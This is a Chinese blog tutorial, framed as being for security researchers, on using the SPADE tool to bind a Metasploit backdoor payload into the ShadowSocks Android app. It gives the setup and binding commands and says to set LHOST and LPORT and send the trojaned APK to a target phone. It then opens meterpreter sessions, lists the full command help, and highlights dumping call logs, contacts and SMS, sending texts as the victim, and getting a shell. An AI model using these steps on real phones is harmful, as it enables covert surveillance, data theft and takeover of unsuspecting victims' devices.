SPADE,一款安卓手机的后门控制工具,安全研究人员可以以此了解和研究安卓后门原理

0X01 前言:

对于一些常规的应用,是可以通过这个工具进行反编译,插代码,再编译的,但也有一些其他的APK并不能!
这里我们以我大家翻墙专用的ShadowSocks.apk为例子进行演示。
本次试用的系统为Ubuntu 14.04.1 LTS ,当然你的主机上事先安装metasploit

0x02 搭建:

0x01:

我们先把代码git clone到本地。

git clone https://github.com/suraj-root/spade.git

0x02:

因为初始化的ubuntu系统并没有安装java的环境!我们现在默认安装一个
在命令行中输入java 回车 .安装default—jre环境!
qq%e6%88%aa%e5%9b%be20161029210559

apt-get install default-jre

0x03

这样环境就搭建好了。之后,利用以下命令开始捆绑恶意载体。

cd spade/
./spade.py /root/ShadowSocks.apk

qq%e6%88%aa%e5%9b%be20161029211040
在上面三个箭头的地方,需要设置Payload,LHOST,LPORT。
贴一张中间过程图片
qq%e6%88%aa%e5%9b%be20161029211206
是否选择现在监听,我们选yes!即可进入 msfconsole
qq%e6%88%aa%e5%9b%be20161029211843
现在我们回到spade目录下面。看到这么多的文件,
qq%e6%88%aa%e5%9b%be20161029224640

0x04

好了,你可以向目标手机发送apk或下载链接了,apk程序安装的同时,将会执行我们设置的恶意payload。
当手机执行APK的时候。会有下面提示,!
qq%e6%88%aa%e5%9b%be20161029214038
之后,通过命令查看实际控制效果

sessions –i        //列出当前的会话终端
qq%e6%88%aa%e5%9b%be20161029225036

sessions –i 1      //进入目标手机
qq%e6%88%aa%e5%9b%be20161029225052

0x03 执行:

现在就可以对目标手机进行YY了,输入help可以看到各种参数的说明


meterpreter > help
Core Commands
=============
    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for 'load'
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel
Stdapi: File system Commands
============================
    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory
Stdapi: Networking Commands
===========================
    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table
Stdapi: System Commands
=======================
    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS
Stdapi: Webcam Commands
=======================
    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam
Android Commands
================
    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wlan_geolocate    Get current lat-long using WLAN information

 
下面列举BT的功能

    sysinfo           Gets information about the remote system, such as OS 获取当前系统信息
    dump_calllog      Get call log        获取手机通话记录
    dump_contacts     Get contacts list	  获取手机联系人目录
    dump_sms          Get sms messages	  获取手机短信息
    send_sms          Sends SMS from target session  代替手机本人对任何人发短信 例如  send_sms -d 10086 -t 我爱你!
    shell    				  获取手机的终端

qq%e6%88%aa%e5%9b%be20161029231053

 

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注